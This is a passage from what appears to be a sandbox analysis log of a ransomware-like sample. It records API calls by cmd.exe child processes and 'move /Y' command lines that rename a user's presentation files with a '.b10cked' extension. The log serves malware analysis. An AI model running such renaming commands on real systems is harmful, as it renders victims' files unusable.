lpFindFileData=0x28f5a4) returned 0x80040 [0235.161] FindClose (in: hFindFile=0x80040 | out: hFindFile=0x80040) returned 1 [0235.161] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0235.161] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0235.161] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0235.161] GetEnvironmentStringsW () returned 0x82b20* [0235.161] FreeEnvironmentStringsW (penv=0x82b20) returned 1 [0235.161] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.162] GetConsoleOutputCP () returned 0x1b5 [0235.162] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.162] GetUserDefaultLCID () returned 0x409 [0235.162] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49fd4950, cchData=8 | out: lpLCData=":") returned 2 [0235.162] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28f968, cchData=128 | out: lpLCData="0") returned 2 [0235.162] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28f968, cchData=128 | out: lpLCData="0") returned 2 [0235.162] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28f968, cchData=128 | out: lpLCData="1") returned 2 [0235.162] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49fd4940, cchData=8 | out: lpLCData="/") returned 2 [0235.162] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49fd4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0235.162] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49fd4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0235.162] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49fd4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0235.162] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49fd4cc0, 
cchData=32 | out: lpLCData="Thu") returned 4 [0235.162] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49fd4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0235.162] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49fd4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0235.162] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49fd4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0235.162] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49fd4930, cchData=8 | out: lpLCData=".") returned 2 [0235.162] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49fd4920, cchData=8 | out: lpLCData=",") returned 2 [0235.162] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0235.163] GetConsoleTitleW (in: lpConsoleTitle=0x70900, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.163] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0235.164] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0235.164] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0235.164] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0235.164] _wcsicmp (_String1="move", _String2=")") returned 68 [0235.164] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0235.164] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0235.164] _wcsicmp (_String1="IF", _String2="move") returned -4 [0235.164] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0235.164] _wcsicmp (_String1="REM", _String2="move") returned 5 [0235.164] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0235.167] GetConsoleTitleW (in: lpConsoleTitle=0x28f660, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.167] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0235.167] _wcsicmp (_String1="move", _String2="ERASE") returned 8 
[0235.167] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0235.167] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0235.167] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0235.168] _wcsicmp (_String1="move", _String2="CD") returned 10 [0235.168] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0235.168] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0235.168] _wcsicmp (_String1="move", _String2="REN") returned -5 [0235.168] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0235.168] _wcsicmp (_String1="move", _String2="SET") returned -6 [0235.168] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0235.168] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0235.168] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0235.168] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0235.168] _wcsicmp (_String1="move", _String2="MD") returned 11 [0235.168] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0235.168] _wcsicmp (_String1="move", _String2="RD") returned -5 [0235.168] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0235.168] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0235.168] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0235.168] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0235.168] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0235.168] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0235.168] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0235.168] _wcsicmp (_String1="move", _String2="VER") returned -9 [0235.168] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0235.168] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0235.168] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0235.168] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0235.168] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0235.168] _wcsicmp (_String1="move", _String2="START") 
returned -6 [0235.168] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0235.168] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0235.168] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0235.169] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0235.169] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0235.169] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x28f41c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x28f414, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x28f414*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 
[0235.170] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0235.171] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0235.171] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0235.171] _wcsicmp (_String1="MMWJ0D~1.ODP", _String2=".") returned 63 [0235.171] _wcsicmp (_String1="MMWJ0D~1.ODP", _String2="..") returned 63 [0235.171] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\MMWJ0D~1.ODP" (normalized: 
"c:\\users\\eebsym5\\docume~1\\fcfnne~1\\mmwj0d~1.odp")) returned 0x20 [0235.171] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x81e90 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.171] SetErrorMode (uMode=0x0) returned 0x0 [0235.171] SetErrorMode (uMode=0x1) returned 0x0 [0235.171] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\MMWJ0D~1.ODP", nBufferLength=0x104, lpBuffer=0x28eda4, lpFilePart=0x28ed8c | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\MMWJ0D~1.ODP", lpFilePart=0x28ed8c*="MMWJ0D~1.ODP") returned 0x2f [0235.171] SetErrorMode (uMode=0x0) returned 0x1 [0235.171] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1")) returned 0x12 [0235.171] _wcsicmp (_String1="MMWJ0D~1.ODP", _String2=".") returned 63 [0235.171] _wcsicmp (_String1="MMWJ0D~1.ODP", _String2="..") returned 63 [0235.171] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\MMWJ0D~1.ODP" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\mmwj0d~1.odp")) returned 0x20 [0235.172] SetErrorMode (uMode=0x0) returned 0x0 [0235.172] SetErrorMode (uMode=0x1) returned 0x0 [0235.172] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\MMWJ0D~1.ODP", nBufferLength=0x104, lpBuffer=0x28f220, lpFilePart=0x28efb8 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\MMWJ0D~1.ODP", lpFilePart=0x28efb8*="MMWJ0D~1.ODP") returned 0x2f [0235.172] SetErrorMode (uMode=0x0) returned 0x1 [0235.172] SetErrorMode (uMode=0x0) returned 0x0 [0235.172] SetErrorMode (uMode=0x1) returned 0x0 [0235.172] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Mmwj0D0mDfuQB5wXA.odp.b10cked", nBufferLength=0x104, lpBuffer=0x28f428, lpFilePart=0x28efb8 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Mmwj0D0mDfuQB5wXA.odp.b10cked", lpFilePart=0x28efb8*="Mmwj0D0mDfuQB5wXA.odp.b10cked") returned 0x40 [0235.172] 
SetErrorMode (uMode=0x0) returned 0x1 [0235.172] SetLastError (dwErrCode=0x0) [0235.172] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Mmwj0D0mDfuQB5wXA.odp.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\mmwj0d0mdfuqb5wxa.odp.b10cked")) returned 0xffffffff [0235.172] GetLastError () returned 0x2 [0235.172] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\MMWJ0D~1.ODP", fInfoLevelId=0x1, lpFindFileData=0x28e934, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e934) returned 0x70ef0 [0235.172] FindNextFileW (in: hFindFile=0x70ef0, lpFindFileData=0x28e934 | out: lpFindFileData=0x28e934) returned 0 [0235.173] GetLastError () returned 0x12 [0235.173] FindClose (in: hFindFile=0x70ef0 | out: hFindFile=0x70ef0) returned 1 [0235.174] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\MMWJ0D~1.ODP", fInfoLevelId=0x1, lpFindFileData=0x81c30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x81c30) returned 0x70ef0 [0235.174] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Mmwj0D0mDfuQB5wXA.odp.b10cked", nBufferLength=0x104, lpBuffer=0x28ebcc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Mmwj0D0mDfuQB5wXA.odp.b10cked", lpFilePart=0x0) returned 0x40 [0235.174] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Mmwj0D0mDfuQB5wXA.odp", nBufferLength=0x104, lpBuffer=0x28ebcc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Mmwj0D0mDfuQB5wXA.odp", lpFilePart=0x0) returned 0x38 [0235.174] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Mmwj0D0mDfuQB5wXA.odp" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\mmwj0d0mdfuqb5wxa.odp")) returned 0x20 [0235.174] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Mmwj0D0mDfuQB5wXA.odp" (normalized: 
"c:\\users\\eebsym5\\docume~1\\fcfnne~1\\mmwj0d0mdfuqb5wxa.odp"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Mmwj0D0mDfuQB5wXA.odp.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\mmwj0d0mdfuqb5wxa.odp.b10cked"), dwFlags=0x3) returned 1 [0235.176] FindClose (in: hFindFile=0x70ef0 | out: hFindFile=0x70ef0) returned 1 [0235.176] _vsnwprintf (in: _Buffer=0x49fd5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x28eb80 | out: _Buffer=" 1") returned 9 [0235.176] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.176] GetFileType (hFile=0x7) returned 0x2 [0235.386] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0235.386] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28eb0c | out: lpMode=0x28eb0c) returned 1 [0235.386] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.386] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x28eb40 | out: lpConsoleScreenBufferInfo=0x28eb40) returned 1 [0235.386] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0235.387] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, nSize=0x2000, Arguments=0x28eb80 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0235.387] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49fe4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x28eb64, lpReserved=0x0 | out: lpBuffer=0x49fe4640*, lpNumberOfCharsWritten=0x28eb64*=0x1a) returned 1 [0235.387] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.387] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0235.387] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.387] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0235.387] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.387] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | 
out: lpMode=0x49fd41b0) returned 1 [0235.387] SetConsoleInputExeNameW () returned 0x1 [0235.387] GetConsoleOutputCP () returned 0x1b5 [0235.387] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.387] SetThreadUILanguage (LangId=0x0) returned 0x409 [0235.388] exit (_Code=0) Process: id = "637" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b80" os_pid = "0xc24" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFL3TY~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFl3tyKJKu.ppt.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35078 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35079 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35080 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35081 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 35082 start_va = 0x49fb0000 end_va = 0x49ffbfff entry_point = 0x49fb0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" 
(normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 35083 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35084 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35085 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35086 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 35087 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35450 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35451 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35452 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35453 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 35454 start_va = 0x520000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 35455 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: 
"c:\\windows\\system32\\winbrand.dll") Region: id = 35456 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35457 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35458 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35459 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35460 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35461 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35462 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35463 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35464 start_va = 0x220000 end_va = 0x2e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 35465 start_va = 0x76490000 end_va = 
0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35466 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35467 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 35468 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 35469 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 35470 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 35471 start_va = 0x400000 end_va = 0x500fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 35472 start_va = 0x530000 end_va = 0x112ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 35473 start_va = 0x1130000 end_va = 0x1292fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001130000" filename = "" Thread: id = 877 os_tid = 0x794 [0235.110] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afb6c | out: lpSystemTimeAsFileTime=0x1afb6c*(dwLowDateTime=0xbf990be0, dwHighDateTime=0x1d440a9)) [0235.110] GetCurrentProcessId () returned 0xc24 [0235.110] GetCurrentThreadId () returned 0x794 [0235.110] GetTickCount () returned 0x408e5 [0235.110] QueryPerformanceCounter (in: lpPerformanceCount=0x1afb64 | out: lpPerformanceCount=0x1afb64*=29189967579) returned 1 [0235.111] GetModuleHandleA (lpModuleName=0x0) returned 0x49fb0000 
[0235.111] __set_app_type (_Type=0x1) [0235.111] __p__fmode () returned 0x76b331f4 [0235.111] __p__commode () returned 0x76b331fc [0235.111] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49fd21a6) returned 0x0 [0235.111] __getmainargs (in: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c, _DoWildCard=0, _StartInfo=0x49fd4140 | out: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c) returned 0 [0235.111] GetCurrentThreadId () returned 0x794 [0235.111] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x794) returned 0x38 [0235.111] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0235.112] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0235.112] SetThreadUILanguage (LangId=0x0) returned 0x409 [0235.112] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0235.112] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1afafc | out: phkResult=0x1afafc*=0x0) returned 0x2 [0235.112] VirtualQuery (in: lpAddress=0x1afb33, lpBuffer=0x1afacc, dwLength=0x1c | out: lpBuffer=0x1afacc*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0235.112] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1afacc, dwLength=0x1c | out: lpBuffer=0x1afacc*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0235.112] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1afacc, dwLength=0x1c | out: lpBuffer=0x1afacc*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0235.112] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1afacc, dwLength=0x1c | out: 
